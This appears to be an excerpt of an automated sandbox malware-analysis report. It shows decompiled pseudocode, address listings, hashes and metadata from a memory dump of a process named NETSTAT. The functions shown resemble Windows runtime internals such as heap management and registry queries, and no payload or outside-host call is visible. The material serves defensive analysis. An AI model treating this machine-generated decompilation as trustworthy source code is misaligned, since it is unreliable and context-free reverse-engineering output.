                0x033afae9
                0x033afaeb
                0x033afaed
                0x033afaef
                0x033afaf7
                0x033afaf8
                0x033afafd
                0x033afaff
                0x033afb04
                0x033afb04
                0x033afaff
                0x03352ec0
                0x03352ec4
                0x03352ec6
                0x03352ec8
                0x033afb14
                0x033afb18
                0x033afb1e
                0x033afb21
                0x033afb21
                0x03352ece
                0x03352ece
                0x03352ece
                0x03352ed7
                0x03352e61
                0x03352e63
                0x033afa6b
                0x033afa71
                0x033afa76
                0x033afa78
                0x033afa8a
                0x033afa7a
                0x033afa83
                0x033afa83
                0x033afa8f
                0x033afa91
                0x033afa97
                0x033afa9d
                0x033afaa4
                0x033afaaa
                0x033afaaf
                0x033afab1
                0x033afac3
                0x033afab3
                0x033afabc
                0x033afabc
                0x033afac8
                0x033afacb
                0x033afadf
                0x033afadf
                0x033afacb
                0x033afaa4
                0x033afa91
                0x03352e6f
                0x03352e6f
                0x03352e5f
                0x033afa13
                0x033afa15
                0x033afa17
                0x033afa1f
                0x033afa21
                0x033afa22
                0x033afa25
                0x033afa28
                0x033afa2f
                0x033afa2f
                0x033afa2a
                0x033afa2a
                0x033afa2a
                0x033afa31
                0x033afa34
                0x033afa36
                0x033afa3c
                0x033afa3e
                0x033afa41
                0x033afa43
                0x033afa45
                0x033afa45
                0x033afa41
                0x033afa3c
                0x033afa4a
                0x033afa4f
                0x033afa51
                0x033afa53
                0x033afa56
                0x033afa5b
                0x033afa5e
                0x00000000
                0x033afa5e
                0x03352e23

                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID: RTL: Re-Waiting
                • API String ID: 0-316354757
                • Opcode ID: c12c3b29fa7cf946e197f477e7f67129a11d6294cebaf39bf8574fc36ea64b64
                • Instruction ID: af6fccd6f3eca9c394128f941905f258cc09f6149a1a9dcc7e6a7bc717e9d50b
                • Opcode Fuzzy Hash: c12c3b29fa7cf946e197f477e7f67129a11d6294cebaf39bf8574fc36ea64b64
                • Instruction Fuzzy Hash: 9461F331E00A449FDB21DF6CCCC0BBFB7E9EB49714F180AA9E8219B6D0D77499418B91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 03420EA5 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                Download Yara Rule
                C-Code - Quality: 80%
                			E03420EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E0341FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E03421074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E03399730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E0341A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E0341A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x3448b04 >> 0x14) + (_v44 -  *0x3448b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E03377D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0341138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E03377D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E0340FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x3448724 & 0x00000008) != 0) {
						E034152F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E034215B5(0x3448ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                0x03420eb7
                0x03420eb9
                0x03420ec0
                0x03420ec2
                0x03420ecd
                0x0342105b
                0x0342105b
                0x03421061
                0x03421066
                0x03421066
                0x0342106b
                0x03421073
                0x03421073
                0x03420ed3
                0x03420ed6
                0x03420edc
                0x03420ee0
                0x03420ee7
                0x03420ef0
                0x03420ef5
                0x03420efa
                0x03420efc
                0x03420efd
                0x03420f03
                0x03420f04
                0x03420f06
                0x03420f07
                0x03420f09
                0x03420f0e
                0x03420f14
                0x03420f23
                0x03420f2d
                0x03420f34
                0x03420f34
                0x03420f14
                0x03420f52
                0x00000000
                0x00000000
                0x03420f58
                0x03420f73
                0x03420f74
                0x03420f79
                0x03420f7d
                0x03420f80
                0x03420f86
                0x03420fab
                0x03420fb5
                0x03420fc6
                0x03420fd1
                0x03420fe3
                0x03420fd3
                0x03420fdc
                0x03420fdc
                0x03420feb
                0x03421009
                0x03421009
                0x03421015
                0x03421027
                0x03421017
                0x03421020
                0x03421020
                0x0342102f
                0x0342103c
                0x0342103c
                0x03421048
                0x03421050
                0x03421050
                0x03421055
                0x00000000
                0x03421055
                0x03420f88
                0x03420f9e
                0x03420fa2
                0x03420fa9
                0x00000000
                0x00000000
                0x00000000
                0x03420fa9
                0x00000000

                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID: `
                • API String ID: 0-2679148245
                • Opcode ID: d2524d80445e9434f093ef04bfc38c33fcdf15512922f99778b52c41acbdde8f
                • Instruction ID: a081b38f3a1ea22ed60a4eb04e44968e714d27c6f2e46e9ead425de9f94f4664
                • Opcode Fuzzy Hash: d2524d80445e9434f093ef04bfc38c33fcdf15512922f99778b52c41acbdde8f
                • Instruction Fuzzy Hash: 6C51C1712043819FD324DF29D980B1BBBE5EBC4344F44092EF596AF690D771E806C766
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0338F0BF Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                Download Yara Rule
                C-Code - Quality: 75%
                			E0338F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E03374120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E03399830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E03399990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E033995D0();
							goto L11;
						} else {
							_t109 = L03374620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E0339F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E033995D0();
										L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                0x0338f0d3
                0x0338f0d9
                0x0338f0e0
                0x0338f0e7
                0x0338f0f2
                0x0338f0f4
                0x0338f0f8
                0x0338f100
                0x0338f108
                0x0338f10d
                0x0338f115
                0x0338f116
                0x0338f11f
                0x0338f123
                0x0338f124
                0x0338f12c
                0x0338f130
                0x0338f134
                0x0338f13d
                0x0338f144
                0x0338f14b
                0x0338f152
                0x033cbab0
                0x033cbab0
                0x0338f158
                0x0338f158
                0x0338f15a
                0x0338f160
                0x0338f165
                0x0338f166
                0x0338f16f
                0x0338f173
                0x033cbaa7
                0x033cbaa7
                0x033cbaab
                0x00000000
                0x0338f179
                0x0338f18d
                0x0338f191
                0x033cbaa2
                0x00000000
                0x0338f197
                0x0338f19b
                0x0338f1a2
                0x0338f1a9
                0x0338f1af
                0x0338f1b2
                0x0338f1b6
                0x0338f1b9
                0x0338f1c4
                0x0338f1d8
                0x0338f1df
                0x0338f1e3
                0x0338f1eb
                0x0338f1ee
                0x0338f1f4
                0x0338f20f
                0x033cbab7
                0x033cbabb
                0x033cbacc
                0x033cbad1
                0x0338f215
                0x0338f218
                0x0338f226
                0x0338f22b
                0x00000000
                0x0338f22b
                0x0338f1f6
                0x0338f1f6
                0x0338f1f9
                0x0338f1fb
                0x0338f1fb
                0x0338f1f4
                0x0338f191
                0x0338f173
                0x0338f152
                0x0338f203

                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID: @
                • API String ID: 0-2766056989
                • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                • Instruction ID: df4d4c564d78445cc8d37e1706d4a3256002de309ef8d5a0d6da01599cd291ce
                • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                • Instruction Fuzzy Hash: 12515A75504750AFD320DF29C881A6BBBF8FF48710F00892EF9959B690E7B4E914CB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 033D3540 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                Download Yara Rule
                C-Code - Quality: 75%
                			E033D3540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x344d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E03390BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E033D3706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E0339FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E033D3540;
						E0339FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E033ADDD0( &_v1072, _t75, _t79, _t80, _t81);
						E033E0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E033997C0();
					}
					return E0339B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E033D3971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E033D3884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E0339FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E03399650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E033D3787(_a4,  &_v352, _t80);
						}
					}
					L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E033995D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                0x033d3552
                0x033d355a
                0x033d355d
                0x033d3566
                0x033d3567
                0x033d357e
                0x033d358f
                0x033d35a1
                0x033d35a5
                0x033d366b
                0x033d366b
                0x033d366d
                0x033d3672
                0x033d3679
                0x033d3685
                0x033d368d
                0x033d369d
                0x033d36a7
                0x033d36b8
                0x033d36c6
                0x033d36c7
                0x033d36dc
                0x033d36e1
                0x033d36e7
                0x033d36e9
                0x033d36e9
                0x033d3703
                0x033d3703
                0x033d35b5
                0x033d35c0
                0x033d35c4
                0x00000000
                0x00000000
                0x033d35ca
                0x033d35d7
                0x033d35e2
                0x033d35e6
                0x033d35e8
                0x033d35f5
                0x033d35fa
                0x033d3603
                0x033d3604
                0x033d3609
                0x033d360a
                0x033d3612
                0x033d3613
                0x033d361e
                0x033d3622
                0x033d3628
                0x033d362f
                0x033d362f
                0x033d3636
                0x033d3638
                0x033d363b
                0x033d3642
                0x033d3642
                0x033d3636
                0x033d3657
                0x033d3657
                0x033d365c
                0x033d3662
                0x033d3669
                0x00000000
                0x00000000
                0x00000000
                0x00000000

                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID: BinaryHash
                • API String ID: 2994545307-2202222882
                • Opcode ID: e45da4c914cb84f10f75938eaa9181b705aa220f6a522d436a7114616ff0c8f7
                • Instruction ID: d55eae6d02988c2389f5656af119bf5320eb1396c48040c22d47c32153923361
                • Opcode Fuzzy Hash: e45da4c914cb84f10f75938eaa9181b705aa220f6a522d436a7114616ff0c8f7
                • Instruction Fuzzy Hash: B14124B6D0162C9BDF21DA50DCC0FEEB77CAB44724F0045E5AA09AB240DB709E88CF95
                Uniqueness

                Uniqueness Score: -1.00%

                Function 034205AC Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                Download Yara Rule
                C-Code - Quality: 71%
                			E034205AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E034207DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E03399730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E0341A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E0341A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E03421293(_t79, _v40, E034207DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E03377D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E0341138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                0x034205c5
                0x034205ca
                0x034205d3
                0x034206db
                0x034206db
                0x034206dd
                0x034206e3
                0x034206e3
                0x034205dd
                0x034205e7
                0x034205f6
                0x03420600
                0x03420607
                0x03420610
                0x03420615
                0x0342061a
                0x0342061c
                0x0342061e
                0x03420624
                0x03420625
                0x03420627
                0x03420628
                0x03420631
                0x03420640
                0x0342064d
                0x03420654
                0x03420654
                0x03420631
                0x0342066d
                0x03420674
                0x00000000
                0x00000000
                0x03420692
                0x0342069e
                0x034206b0
                0x034206a0
                0x034206a9
                0x034206a9
                0x034206b8
                0x034206d6
                0x034206d6
                0x00000000

                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID: `
                • API String ID: 0-2679148245
                • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                • Instruction ID: fd12e013ef46c3a420e33a3900102d20c841b3823849dd91215ab15c1c420eb8
                • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                • Instruction Fuzzy Hash: 103113326003156FE720DE25CD84F9BBBD9ABC4754F08422AF954EF290D770E904C7A5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 033D3884 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                Download Yara Rule
                C-Code - Quality: 72%
                			E033D3884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E03399650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L03374620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E03399650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                0x033d3893
                0x033d3896
                0x033d3899
                0x033d389f
                0x033d38a0
                0x033d38a4
                0x033d38a9
                0x033d38ac
                0x033d38ad
                0x033d38ae
                0x033d38af
                0x033d38b1
                0x033d38b4
                0x033d38bb
                0x033d38bc
                0x033d38bd
                0x033d38c4
                0x033d38c8
                0x033d38ca
                0x033d38ca
                0x033d38d5
                0x033d393e
                0x033d3940
                0x033d3942
                0x033d3952
                0x033d3954
                0x033d3961
                0x033d3961
                0x033d3967
                0x033d396e
                0x033d396e
                0x033d3947
                0x033d394c
                0x00000000
                0x033d394c
                0x033d38ea
                0x033d38ee
                0x033d38f8
                0x033d38f9
                0x033d38ff
                0x033d3900
                0x033d3902
                0x033d3903
                0x033d390b
                0x033d390f
                0x033d3950
                0x00000000
                0x033d3950
                0x033d3915
                0x033d391d
                0x033d391d
                0x033d3922
                0x033d3926
                0x00000000
                0x033d3928
                0x033d392b
                0x033d392b
                0x033d3935
                0x033d3937
                0x033d3937
                0x00000000
                0x033d3935
                0x033d3926
                0x033d38f0
                0x00000000

                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID: BinaryName
                • API String ID: 2994545307-215506332
                • Opcode ID: dc4165d78a42bc15788747a4bbaf378af8710d632634efc81ef52d26293e1378
                • Instruction ID: 735b0e0e5b7d5087454da8c76ab3f816910670b4422b403d9c76ff11bd147b22
                • Opcode Fuzzy Hash: dc4165d78a42bc15788747a4bbaf378af8710d632634efc81ef52d26293e1378
                • Instruction Fuzzy Hash: 4E31E03BD01609AFEB25DA58D985E6BF778EF80B30F054169E816AB240D7309E04C7A2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0338D294 Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                Download Yara Rule
                C-Code - Quality: 33%
                			E0338D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x344d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E03374120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E0339B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E033998D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E033995D0();
					L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                0x0338d29c
                0x0338d2a6
                0x0338d2b1
                0x0338d2b5
                0x0338d2b6
                0x0338d2bc
                0x0338d2bd
                0x0338d2be
                0x0338d2bf
                0x0338d2c2
                0x0338d2c4
                0x0338d2cc
                0x0338d384
                0x0338d34b
                0x0338d34f
                0x0338d350
                0x0338d351
                0x0338d35c
                0x0338d35c
                0x0338d2d6
                0x0338d2da
                0x0338d2e1
                0x0338d361
                0x0338d369
                0x0338d36d
                0x0338d2e3
                0x0338d2e3
                0x0338d2e3
                0x0338d2e5
                0x0338d2ed
                0x0338d2f5
                0x0338d2fa
                0x0338d302
                0x0338d303
                0x0338d30b
                0x0338d30f
                0x0338d313
                0x0338d318
                0x0338d31c
                0x0338d320
                0x0338d379
                0x0338d37d
                0x00000000
                0x00000000
                0x033caffe
                0x033cb001
                0x033cb011
                0x00000000
                0x0338d322
                0x0338d322
                0x0338d330
                0x0338d337
                0x0338d35d
                0x0338d339
                0x0338d33f
                0x0338d38c
                0x0338d38c
                0x0338d33f
                0x0338d349
                0x00000000
                0x0338d349

                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
